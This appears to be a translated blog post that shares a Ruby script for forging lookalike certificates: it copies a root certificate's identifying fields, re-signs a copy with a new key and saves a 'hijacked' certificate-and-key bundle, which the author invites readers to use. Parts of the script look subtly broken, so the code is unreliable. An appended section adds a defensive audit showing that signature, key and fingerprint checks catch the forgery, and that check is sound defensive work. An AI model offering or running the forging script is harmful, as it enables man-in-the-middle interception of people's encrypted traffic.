Ruby OpenSSL Private Key Forging Script
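The OpenSSL Heartbleed bug a while back had us on edge for several days.
From user data leaks to the products built around OpenSSL, from the server side to the client side, from HTTPS private key leaks to private key leaks in OpenVPN, OpenSSH, SFTP and so on. In many places there was nothing we could do.
Too many users believe that HTTPS by itself means they are safe, yet all kinds of man-in-the-middle attacks had already appeared before this.
Below I am also posting a piece of code for everyone to look at. It is private key forging with Ruby OpenSSL.
For the sake of social harmony, I won't go into the specific usage. If you can read it, just take it and use it…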
```ruby
require 'rubygems'
require 'openssl'
require 'digest/md5'

# Freshly generated RSA key pair; it is unrelated to the key inside root.cer.
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) # not used below
ctx = OpenSSL::SSL::SSLContext.new

puts "Spoof must be in DER format and saved as root.cer"
raw = File.read "root.cer"

# Parse the input certificate twice: `cert` is the copy that gets written out,
# ef.issuer_certificate is the copy that gets re-signed.
cert = OpenSSL::X509::Certificate.new raw
cert.version = 2
ef = OpenSSL::X509::ExtensionFactory.new
ef.issuer_certificate = OpenSSL::X509::Certificate.new raw

# Copy every identifying field from the original certificate.
cert.subject = ef.issuer_certificate.subject
ef.subject_certificate = ef.issuer_certificate
cert.issuer = ef.issuer_certificate.issuer
cert.serial = ef.issuer_certificate.serial
ctx.key = ef.issuer_certificate.public_key
cert.public_key = ef.issuer_certificate.public_key
cert.not_after = ef.issuer_certificate.not_after
cert.not_before = ef.issuer_certificate.not_before
cert.extensions = ef.issuer_certificate.extensions

# root.key = the certificate's public key followed by the new private key.
a = File.open("root"".key", "w")
a.syswrite("#{cert.public_key}")
a.syswrite("#{key.to_pem}")
spoof = OpenSSL::PKey::RSA.new File.read 'root.key'
printf "Verifying Keys Work: "
puts spoof.private?
ctx.cert = ef.issuer_certificate
puts "============================================================="

# Re-sign the second copy of the certificate with the new key.
root = ef.issuer_certificate.sign(spoof, OpenSSL::Digest::SHA1.new)

# Write the key, the DER certificate, and a PEM bundle of certificate plus key.
filer = File.open("#{cert.serial}"".key", "w")
filer.syswrite("#{spoof.to_pem}")
file = File.open("spoof"".cer", "w")
file.syswrite("#{cert.to_der}")
files = File.open("#{cert.serial}"".pem", "w")
files.syswrite("#{cert.to_pem}")
files.syswrite("#{spoof.to_pem}")
puts "Hijacked Certificate with chainloaded key saved @ #{cert.serial}.pem"
printf "Verifying Keys Intergity: "
# Checks the new signature against the new key only, not against the original issuer.
puts root.verify(key)
```
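The subject, issuer and serial number that the script copies are public values, so a verifier has to rely on the signature, the key match and a pinned fingerprint instead. The Ruby check below is an added example, not part of the original post; the helper names (`make_root`, `fingerprint`, `audit`, `demo`) and the demo root certificate are constructed for illustration, and `demo` repeats the script's re-signing step on that constructed root only.

```ruby
require 'openssl'

# Constructed self-signed root; stands in for the page's root.cer.
def make_root(key)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 0x1001
  name = OpenSSL::X509::Name.parse('/CN=Constructed Demo Root')
  cert.subject = name
  cert.issuer = name
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
end

def fingerprint(cert)
  OpenSSL::Digest::SHA256.hexdigest(cert.to_der)
end

# Audit a certificate/key bundle against a pinned copy of the trusted root.
def audit(cert, key, trusted)
  {
    # Fields a lookalike can copy freely; a match here proves nothing.
    names_and_serial_match: cert.subject.to_der == trusted.subject.to_der &&
                            cert.serial.to_i == trusted.serial.to_i,
    # Does the private key belong to the public key inside the certificate?
    key_matches_cert: cert.check_private_key(key),
    # Does the signature verify under the trusted root's public key?
    signed_by_trusted: cert.verify(trusted.public_key),
    # Is this byte-for-byte the certificate that was pinned?
    fingerprint_pinned: fingerprint(cert) == fingerprint(trusted)
  }
end

def demo
  genuine_key = OpenSSL::PKey::RSA.new(2048)
  genuine = make_root(genuine_key)
  other_key = OpenSSL::PKey::RSA.new(2048) # unrelated key, like `key` in the script
  # Same step as the script: re-sign a copy of the root with the unrelated key.
  resigned = OpenSSL::X509::Certificate.new(genuine.to_der)
  resigned.sign(other_key, OpenSSL::Digest.new('SHA256'))
  { genuine: audit(genuine, genuine_key, genuine),
    resigned: audit(resigned, other_key, genuine) }
end

demo.each { |label, result| puts "#{label}: #{result}" } if __FILE__ == $PROGRAM_NAME
```

For the re-signed copy only `names_and_serial_match` is true; the key match, the signature check against the trusted key and the fingerprint pin all fail.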
